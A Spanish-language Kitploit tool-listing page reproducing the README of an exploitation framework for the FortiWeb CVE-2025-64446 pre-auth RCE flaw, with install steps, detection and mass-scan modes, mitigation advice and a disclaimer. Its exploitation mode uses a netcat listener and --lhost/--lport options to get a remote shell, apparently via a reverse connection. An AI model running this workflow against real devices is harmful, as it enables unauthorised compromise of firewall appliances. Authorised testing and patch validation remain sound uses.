Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — Security research tool for FortiWeb CVE-2025-64446 vulnerability. Automated exploitation framework with advanced logging, real-time metrics, proxy debugging, and professional reporting. Includes retry logic, multi-threading, and configurable settings. For authorized security testing only. CVSS 9.8 Critical. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Ver Repositorio
1hace 21 díasAún no revisado

Security research tool for FortiWeb CVE-2025-64446 vulnerability. Automated exploitation framework with advanced logging, real-time metrics, proxy debugging, and professional reporting. Includes retry logic, multi-threading, and configurable settings. For authorized security testing only. CVSS 9.8 Critical.

Compartir

FortiWeb CVE-2025-64446 Exploit de RCE

Python License CVSS CVE Status Version

Marco profesional de investigación de seguridad y evaluación de vulnerabilidades

Instalación · Inicio rápido · Uso · Arquitectura · Referencia de CLI · Aviso legal


Descripción general

FortiWeb Research Tool es un marco de evaluación en Python para la detección y análisis autorizados de CVE-2025-64446, un problema crítico de ejecución remota de código sin autenticación previa que afecta a los dispositivos FortiWeb Web Application Firewall.

Capacidades principales


Resumen de la vulnerabilidad

Confirme siempre las versiones afectadas/corregidas contra el PSIRT de Fortinet antes de definir el alcance de la evaluación.


📸 Capturas de pantalla

UsoResultados del escaneo
PanelResultados del escaneo

Instalación

root@kitploit:~
git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

Dependencias

PaqueteFunción

Opcionales (desarrollo): pytest, black, flake8, mypy, python-dotenv — consulte requirements.txt.


Inicio rápido

root@kitploit:~
# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

Nota: El modo de explotación requiere --lhost. Use --detect-only o --safe-mode cuando no tenga intención de ejecutar la cadena completa.


Guía de uso

Modo de detección

root@kitploit:~
python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

La detección evalúa la accesibilidad, las pistas de versión, la exposición de la API, los indicadores de path traversal, las señales de omisión de autenticación y la accesibilidad del endpoint de subida. El riesgo se clasifica como Crítico / Alto / Medio / Bajo a partir de esos indicadores.

Escaneo masivo

root@kitploit:~
cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

ScannerManager ejecuta los workers de FortiWebScanner mediante un pool de hilos, imprime una tabla resumen de Rich y escribe scan_report.json / scan_report.html.

Modo de explotación (solo laboratorios autorizados)

root@kitploit:~
# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

Archivo de configuración

root@kitploit:~
# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
root@kitploit:~
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

Las opciones de CLI sobrescriben los valores cargados desde YAML.


Arquitectura

root@kitploit:~
exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
ComponenteResponsabilidad
FortiWebScannerComprobaciones de accesibilidad, versión e indicadores CVE

Flujo general para un solo objetivo:

  1. Configuración del banner / registro
  2. Sonda de accesibilidad y versión
  3. Comprobaciones de indicadores (o cadena completa cuando no se está en modo detección/seguro)
  4. Informe JSON + HTML en reports/
  5. Limpieza cuando corresponda

Características

Detección

  • Comprobaciones de indicadores de path traversal en las rutas de la API de administración
  • Comprobaciones de señales de omisión de autenticación
  • Sondeo de la versión de FortiWeb en endpoints comunes de estado/versión
  • Mapeo de exposición de endpoints de la API
  • Comprobaciones de accesibilidad del endpoint de subida de archivos
  • Puntuación de riesgo a partir de indicadores combinados

Informes y observabilidad

  • Informes JSON y HTML con marca de tiempo
  • Métricas por solicitud (estado, latencia, tasa de éxito)
  • Registros separados: exploit.log, errors.log, requests.log

Controles operativos

  • Escaneo masivo multihilo (--threads)
  • Soporte de proxy HTTP/HTTPS (p. ej., Burp)
  • Reintentos con intentos/retardo configurables (valores predeterminados: 3 / 2 s)
  • User-Agent personalizado, tiempo de espera, alternar verificación SSL (--no-verify)
  • Salida de consola en colores mediante Colorama + Rich

Salida generada

root@kitploit:~
reports/
├── report_YYYYMMDD_HHMMSS.json
├── report_YYYYMMDD_HHMMSS.html
├── scan_report.json
└── scan_report.html

logs/
├── exploit.log
├── errors.log
└── requests.log

Ejemplo de informe JSON (detección)

root@kitploit:~
{
  "metadata": {
    "tool_name": "FortiWeb Research Tool",
    "version": "1.0",
    "author": "Sudeepa Wanigarathna",
    "timestamp": "2026-07-31T00:02:17",
    "mode": "detect"
  },
  "target": {
    "url": "https://192.168.1.100:8443",
    "reachable": true,
    "version": "7.6.0",
    "vulnerable": true,
    "risk_level": "Critical"
  },
  "metrics": {
    "total_requests": 12,
    "average_response_time": 0.42,
    "success_rate": 0.91
  }
}

Referencia de comandos

root@kitploit:~
python3 exploit.py [OPTIONS]

Estructura del proyecto

root@kitploit:~
.
├── exploit.py           # Research tool (detect / scan / exploit)
├── config.yaml          # Example configuration
├── requirements.txt     # Python dependencies
├── reports/             # Generated JSON / HTML reports
├── logs/                # Runtime logs
├── LICENSE
├── SECURITY.md
├── .gitignore
└── README.md

Guía de mitigación

  1. Actualice FortiWeb a una versión parcheada (7.6.7+, 7.8.7+, 8.0.2+ o según las indicaciones actuales de PSIRT).
  2. Restrinja las interfaces de administración a redes de confianza / hosts de salto (jump hosts).
  3. Supervise la actividad de autenticación y de la API de mantenimiento para detectar accesos anómalos.
  4. Rote las credenciales y revise la integridad después de cualquier exposición confirmada.
  5. Vuelva a ejecutar --detect-only / --safe-mode después del parcheo para validar la remediación.

Aviso legal y ético

Esta herramienta es solo para pruebas de seguridad, investigación y educación autorizadas.

  • Utilícela únicamente en sistemas de su propiedad o sobre los que tenga permiso explícito por escrito para realizar pruebas
  • Siga las normas de divulgación responsable y de los programas de bug bounty
  • No la utilice para acceso no autorizado, daños o actividades ilegales

Al utilizar este software, usted confirma que tiene autorización, que no hará un uso indebido y que acepta toda la responsabilidad por sus acciones. El autor no es responsable del uso indebido.

Consulte SECURITY.md para la divulgación privada de vulnerabilidades relacionadas con este proyecto.


Recursos

  • Fortinet PSIRT
  • Aviso: FG-IR-25-64446
  • Descargas de parches
  • NVD: CVE-2025-64446

Contribuciones

  1. Haga un fork del repositorio
  2. Cree una rama: git checkout -b feature/your-change
  3. Haga un commit con un mensaje claro
  4. Haga push y abra un Pull Request

Valide los cambios únicamente en entornos de laboratorio autorizados y evite confirmar datos de objetivos en vivo, cookies o credenciales.


Licencia

Licencia MIT — consulte LICENSE.

Copyright (c) 2026 Sudeepa Wanigarathna


Autor y soporte

AutorSudeepa Wanigarathna
IncidenciasGitHub Issues para este repositorio
SeguridadConsulte SECURITY.md ·

Solo investigación autorizada · FortiWeb CVE-2025-64446

Volver al inicio

Descargar herramienta
AtributoDetalle
AutorSudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8 (Crítico)
ClaseOmisión de autenticación + path traversal → subida arbitraria de archivos → RCE
AfectadosVersiones anteriores a 7.6.7 / 7.8.7 / 8.0.2 (verifique según el aviso oficial)
MitigaciónActualizar a una versión de FortiWeb parcheada
LenguajePython 3.7+
Punto de entradaexploit.py
ModoOpción(es)Propósito
Detección--detect-onlyIndicadores de vulnerabilidad sin explotación
Seguro / solo lectura--safe-modeOmitir pasos de explotación que modifican el estado
Escaneo masivo--targets + --scan-modeEvaluación paralela de múltiples objetivos
Explotación--target + --lhostCadena controlada solo en laboratorios autorizados
Ejecución en seco--dry-runEjecutar el flujo sin aplicar cambios
Informes--output-dirInformes de la evaluación en JSON + HTML
CampoValor
ID de CVECVE-2025-64446
Puntuación CVSS9.8 (Crítico)
ImpactoCompromiso total del sistema cuando se explota con éxito
CorrecciónActualizar a 7.6.7, 7.8.7, 8.0.2 o posterior
Salida HTML
Salida de terminal
requests, urllib3
Cliente HTTP
rich, colorama, tqdmInterfaz de terminal y progreso
pyyamlCarga de config.yaml
ScannerManagerEscaneos paralelos, resúmenes JSON/HTML, tabla resumen
FortiWebExploitSesión basada en configuración, reintentos, métricas, informes y ruta de explotación opcional
LogManagerRegistro estructurado en archivos y consola con colores
OpciónDescripción
--target URLURL base de un solo FortiWeb
--targets FILELista de objetivos separados por saltos de línea
--lhost IPHost del listener (requerido para la explotación)
--lport PORTPuerto del listener (predeterminado: 4444)
--config FILEConfiguración YAML
--detect-onlySolo detección; omitir la cadena de explotación
--scan-modeEscaneo de múltiples objetivos (requiere --targets)
--safe-modeSolo lectura; omitir pasos que modifican el estado
--dry-runEjecución en seco sin aplicar cambios
--timeout SECTiempo de espera de la solicitud (predeterminado: 15)
--threads NNúmero de workers de escaneo (predeterminado: 5)
--proxy URLProxy HTTP
--user-agent STRUser-Agent personalizado
-v, --verboseRegistro / consola detallados
--no-verifyDeshabilitar la verificación de certificados TLS
--output-dir DIRDirectorio de informes (predeterminado: reports)
--log-dir DIRDirectorio de registros (predeterminado: logs)
-h, --helpMostrar ayuda
[email protected]